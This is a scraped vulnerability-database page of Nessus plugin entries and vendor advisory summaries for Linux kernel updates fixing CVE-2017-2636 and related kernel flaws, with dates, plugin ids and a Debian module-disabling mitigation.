    descriptionDescription of changes: [2.6.39-400.294.6.el6uek] - RHEL: complement upstream workaround for CVE-2016-10142. (Quentin Casasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142} [2.6.39-400.294.5.el6uek] - net: ping: check minimum size on ICMP header length (Kees Cook) [Orabug: 25766914] {CVE-2016-8399} - ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) [Orabug: 25765786] {CVE-2016-10142} - sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al Viro) [Orabug: 25765448] {CVE-2016-10088} - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) [Orabug: 25752011] {CVE-2017-7187} [2.6.39-400.294.4.el6uek] - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: 25696689] {CVE-2017-2636} - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: 25696689] {CVE-2017-2636} - drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian Frederick) [Orabug: 25696689] {CVE-2017-2636} - list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: 25696689] {CVE-2017-2636} - firewire: net: guard against rx buffer overflows (Stefan Richter) [Orabug: 25451538] {CVE-2016-8633} - x86/mm/32: Enable full randomization on i386 and X86_32 (Hector Marco-Gisbert) [Orabug: 25463929] {CVE-2016-3672} - x86 get_unmapped_area: Access mmap_legacy_base through mm_struct member (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672} - sg_start_req(): make sure that there
    last seen2020-06-01
    modified2020-06-02
    plugin id99161
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99161
    titleOracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3535)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-3804.NASL
    descriptionSeveral vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or have other impacts. - CVE-2016-9588 Jim Mattson discovered that the KVM implementation for Intel x86 processors does not properly handle #BP and #OF exceptions in an L2 (nested) virtual machine. A local attacker in an L2 guest VM can take advantage of this flaw to cause a denial of service for the L1 guest VM. - CVE-2017-2636 Alexander Popov discovered a race condition flaw in the n_hdlc line discipline that can lead to a double free. A local unprivileged user can take advantage of this flaw for privilege escalation. On systems that do not already have the n_hdlc module loaded, this can be mitigated by disabling it:echo >> /etc/modprobe.d/disable-n_hdlc.conf install n_hdlc false - CVE-2017-5669 Gareth Evans reported that privileged users can map memory at address 0 through the shmat() system call. This could make it easier to exploit other kernel security vulnerabilities via a set-UID program. - CVE-2017-5986 Alexander Popov reported a race condition in the SCTP implementation that can be used by local users to cause a denial-of-service (crash). The initial fix for this was incorrect and introduced further security issues ( CVE-2017-6353 ). This update includes a later fix that avoids those. On systems that do not already have the sctp module loaded, this can be mitigated by disabling it:echo >> /etc/modprobe.d/disable-sctp.conf install sctp false - CVE-2017-6214 Dmitry Vyukov reported a bug in the TCP implementation
    last seen2020-06-01
    modified2020-06-02
    plugin id97615
    published2017-03-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97615
    titleDebian DSA-3804-1 : linux - security update
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-1502.NASL
    descriptionAccording to the versions of the kernel packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - The perf_cpu_time_max_percent_handler function in kernel/events/core.c in the Linux kernel before 4.11 allows local users to cause a denial of service (integer overflow) or possibly have unspecified other impact via a large value, as demonstrated by an incorrect sample-rate calculation.(CVE-2017-18255) - In the Linux kernel before 4.13.5, a local user could create keyrings for other users via keyctl commands, setting unwanted defaults or causing a denial of service.(CVE-2017-18270) - The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn
    last seen2020-03-19
    modified2019-05-13
    plugin id124825
    published2019-05-13
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/124825
    titleEulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1502)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2017-0933.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. These updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99383
    published2017-04-14
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99383
    titleCentOS 7 : kernel (CESA-2017:0933)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2072-1.NASL
    descriptionThis update for the Linux Kernel 3.12.67-60_64_21 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102253
    published2017-08-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102253
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2072-1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-0866-1.NASL
    descriptionThe SUSE Linux Enterprise 12 kernel was updated to fix the following security bugs : - CVE-2017-7184: The Linux kernel allowed local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) via unspecified vectors, as demonstrated during a Pwn2Own competition at CanSecWest 2017 (bnc#1030573, bnc#1028372). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bnc#1027565). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99092
    published2017-03-30
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99092
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:0866-1)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2017-1066.NASL
    descriptionAccording to the version of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.(CVE-2017-2636) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-05-06
    modified2017-05-02
    plugin id99913
    published2017-05-02
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99913
    titleEulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1066)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-0912-1.NASL
    descriptionThe SUSE Linux Enterprise 11 SP4 kernel was updated to fix the following security bug : - CVE-2017-2636: A race condition in the n_hdlc tty Linux kernel driver (drivers/tty/n_hdlc.c) could have been exploited to gain a local privilege escalation (bnc#1027565) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99180
    published2017-04-04
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99180
    titleSUSE SLES11 Security Update : kernel (SUSE-SU-2017:0912-1)
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2017-0106.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : - nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [Orabug: 25986995] (CVE-2017-7895) - ocfs2/o2net: o2net_listen_data_ready should do nothing if socket state is not TCP_LISTEN (Tariq Saeed) [Orabug: 25510857] - IB/CORE: sync the resouce access in fmr_pool (Wengang Wang) [Orabug: 23750748] - ipv6: Skip XFRM lookup if dst_entry in socket cache is valid (Jakub Sitnicki) [Orabug: 25534688] - uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug: 25549845] - ksplice: add sysctls for determining Ksplice features. (Jamie Iles) - signal: protect SIGNAL_UNKILLABLE from unintentional clearing. (Jamie Iles) [Orabug: 25549845] - KVM: x86: fix emulation of
    last seen2020-06-01
    modified2020-06-02
    plugin id100238
    published2017-05-17
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100238
    titleOracleVM 3.2 : Unbreakable / etc (OVMSA-2017-0106)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-2E1F3694B2.NASL
    descriptionThis is an update containing several CVE and other misc fixes Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2017-03-13
    plugin id97675
    published2017-03-13
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97675
    titleFedora 24 : kernel (2017-2e1f3694b2)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0932.NASL
    descriptionAn update for kernel-rt is now available for Red Hat Enterprise MRG 2. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A use-after-free flaw was found in the way the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99345
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99345
    titleRHEL 6 : MRG (RHSA-2017:0932)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0933.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. These updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99346
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99346
    titleRHEL 7 : kernel (RHSA-2017:0933)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-387FF46A66.NASL
    descriptionThis is an update containing several CVE and other bug fixes, Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2017-03-13
    plugin id97677
    published2017-03-13
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97677
    titleFedora 25 : kernel (2017-387ff46a66)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-0933-1.NASL
    descriptionDescription of changes: - [3.10.0-514.16.1.0.1.el7.OL7] - [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug 22552377] - Oracle Linux certificates (Alexey Petrenko) - Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(<A HREF=
    last seen2020-06-01
    modified2020-06-02
    plugin id99386
    published2017-04-14
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99386
    titleOracle Linux 7 : kernel (ELSA-2017-0933-1)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-1486.NASL
    descriptionAccording to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities : - It was found that the parse_rock_ridge_inode_internal() function of the Linux kernel
    last seen2020-03-19
    modified2019-05-13
    plugin id124810
    published2019-05-13
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/124810
    titleEulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1486)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3219-2.NASL
    descriptionUSN-3219-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 LTS. Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97604
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97604
    titleUbuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-3219-2)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2060-1.NASL
    descriptionThis update for the Linux Kernel 3.12.62-60_62 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102251
    published2017-08-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102251
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2060-1)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2017-419.NASL
    descriptionThe openSUSE Leap 42.1 kernel was updated to 4.1.39 to receive various security and bugfixes. The following security bugs were fixed : - CVE-2017-5669: The do_shmat function in ipc/shm.c in the Linux kernel did not restrict the address calculated by a certain rounding operation, which allowed local users to map page zero, and consequently bypass a protection mechanism that exists for the mmap system call, by making crafted shmget and shmat system calls in a privileged context (bnc#1026914). - CVE-2017-6348: The hashbin_delete function in net/irda/irqueue.c in the Linux kernel improperly manages lock dropping, which allowed local users to cause a denial of service (deadlock) via crafted operations on IrDA devices (bnc#1027178). - CVE-2017-7184: The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel did not validate certain size data after an XFRM_MSG_NEWAE update, which allowed local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux-image-* package 4.8.0.41.52 (bnc#1030573). - CVE-2016-10200: Race condition in the L2TPv3 IP Encapsulation feature in the Linux kernel allowed local users to gain privileges or cause a denial of service (use-after-free) by making multiple bind system calls without properly ascertaining whether a socket has the SOCK_ZAPPED status, related to net/l2tp/l2tp_ip.c and net/l2tp/l2tp_ip6.c (bnc#1028415). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bnc#1027565). - CVE-2017-6345: The LLC subsystem in the Linux kernel did not ensure that a certain destructor exists in required circumstances, which allowed local users to cause a denial of service (BUG_ON) or possibly have unspecified other impact via crafted system calls (bnc#1027190). - CVE-2017-6346: Race condition in net/packet/af_packet.c in the Linux kernel allowed local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a multithreaded application that made PACKET_FANOUT setsockopt system calls (bnc#1027189). - CVE-2017-6347: The ip_cmsg_recv_checksum function in net/ipv4/ip_sockglue.c in the Linux kernel has incorrect expectations about skb data layout, which allowed local users to cause a denial of service (buffer over-read) or possibly have unspecified other impact via crafted system calls, as demonstrated by use of the MSG_MORE flag in conjunction with loopback UDP transmission (bnc#1027179). - CVE-2017-6353: net/sctp/socket.c in the Linux kernel did not properly restrict association peel-off operations during certain wait states, which allowed local users to cause a denial of service (invalid unlock and double free) via a multithreaded application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-5986 (bnc#1025235). - CVE-2017-6214: The tcp_splice_read function in net/ipv4/tcp.c in the Linux kernel allowed remote attackers to cause a denial of service (infinite loop and soft lockup) via vectors involving a TCP packet with the URG flag (bnc#1026722). - CVE-2016-2117: The atl2_probe function in drivers/net/ethernet/atheros/atlx/atl2.c in the Linux kernel incorrectly enables scatter/gather I/O, which allowed remote attackers to obtain sensitive information from kernel memory by reading packet data (bnc#968697). - CVE-2016-10208: The ext4_fill_super function in fs/ext4/super.c in the Linux kernel did not properly validate meta block groups, which allowed physically proximate attackers to cause a denial of service (out-of-bounds read and system crash) via a crafted ext4 image (bnc#1023377). - CVE-2017-2596: The nested_vmx_check_vmptr function in arch/x86/kvm/vmx.c in the Linux kernel improperly emulates the VMXON instruction, which allowed KVM L1 guest OS users to cause a denial of service (host OS memory consumption) by leveraging the mishandling of page references (bnc#1022785). - CVE-2017-2583: The load_segment_descriptor implementation in arch/x86/kvm/emulate.c in the Linux kernel improperly emulates a
    last seen2020-06-05
    modified2017-04-03
    plugin id99157
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99157
    titleopenSUSE Security Update : the Linux Kernel (openSUSE-2017-419)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-1488.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6.6 Advanced Update Support and Red Hat Enterprise Linux 6.6 Telco Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult. (CVE-2017-1000364, Important) * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) Red Hat would like to thank Qualys Research Labs for reporting CVE-2017-1000364 and Alexander Popov for reporting CVE-2017-2636. Bug Fix(es) : * Previously, the kdump mechanism was trying to get the lock by the vmalloc_sync_all() function during a kernel panic. Consequently, a deadlock occurred, and the crashkernel did not boot. This update fixes the vmalloc_sync_all() function to avoid synchronizing the vmalloc area on the crashing CPU. As a result, the crashkernel parameter now boots as expected, and the kernel dump is collected successfully under the described circumstances. (BZ#1443497) * Previously, a kernel panic occurred when the mcelog daemon executed a huge page memory offline. This update fixes the HugeTLB feature of the Linux kernel to check for the Page Table Entry (PTE) NULL pointer in the page_check_address() function. As a result, the kernel panic no longer occurs under the described circumstances. (BZ#1444349) * Previously, the vmw_pvscsi driver reported most successful aborts as FAILED due to a bug in vmw_pvscsi abort handler. This update fixes the handler, and successful aborts are no longer reported as FAILED. (BZ#1442966)
    last seen2020-06-01
    modified2020-06-02
    plugin id100898
    published2017-06-20
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100898
    titleRHEL 6 : kernel (RHSA-2017:1488) (Stack Clash)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-0913-1.NASL
    descriptionThe SUSE Linux Enterprise 11 SP3 kernel was updated to fix the following security bug : - CVE-2017-2636: A race condition in the n_hdlc tty Linux kernel driver (drivers/tty/n_hdlc.c) could have been exploited to gain a local privilege escalation (bnc#1027565) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99181
    published2017-04-04
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99181
    titleSUSE SLES11 Security Update : kernel (SUSE-SU-2017:0913-1)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-3609.NASL
    descriptionThe remote Oracle Linux host is missing a security update for the Unbreakable Enterprise kernel package(s).
    last seen2020-06-01
    modified2020-06-02
    plugin id102773
    published2017-08-25
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102773
    titleOracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3609) (Stack Clash)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-0933.NASL
    descriptionFrom Red Hat Security Advisory 2017:0933 : An update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. These updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99333
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99333
    titleOracle Linux 7 : kernel (ELSA-2017-0933)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2088-1.NASL
    descriptionThis update for the Linux Kernel 3.12.62-60_64_8 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102307
    published2017-08-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102307
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2088-1)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20170411_KERNEL_ON_SL6_X.NASL
    descriptionSecurity Fix(es) : - A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) - A flaw was found in the Linux kernel
    last seen2020-03-18
    modified2017-04-12
    plugin id99301
    published2017-04-12
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99301
    titleScientific Linux Security Update : kernel on SL6.x i386/x86_64 (20170411)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-0865-1.NASL
    descriptionThe SUSE Linux Enterprise 12 kernel was updated to fix the following security bugs : - CVE-2017-7184: The Linux kernel allowed local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) via unspecified vectors, as demonstrated during a Pwn2Own competition at CanSecWest 2017 (bnc#1030573, bnc#1028372). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bnc#1027565). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99091
    published2017-03-30
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99091
    titleSUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:0865-1)

Redhat

advisories
  • bugzilla
    id1428319
    titleCVE-2017-2636 kernel: Race condition access to n_hdlc.tbuf causes double free in n_hdlc_release()
    oval
    OR
    • commentRed Hat Enterprise Linux must be installed
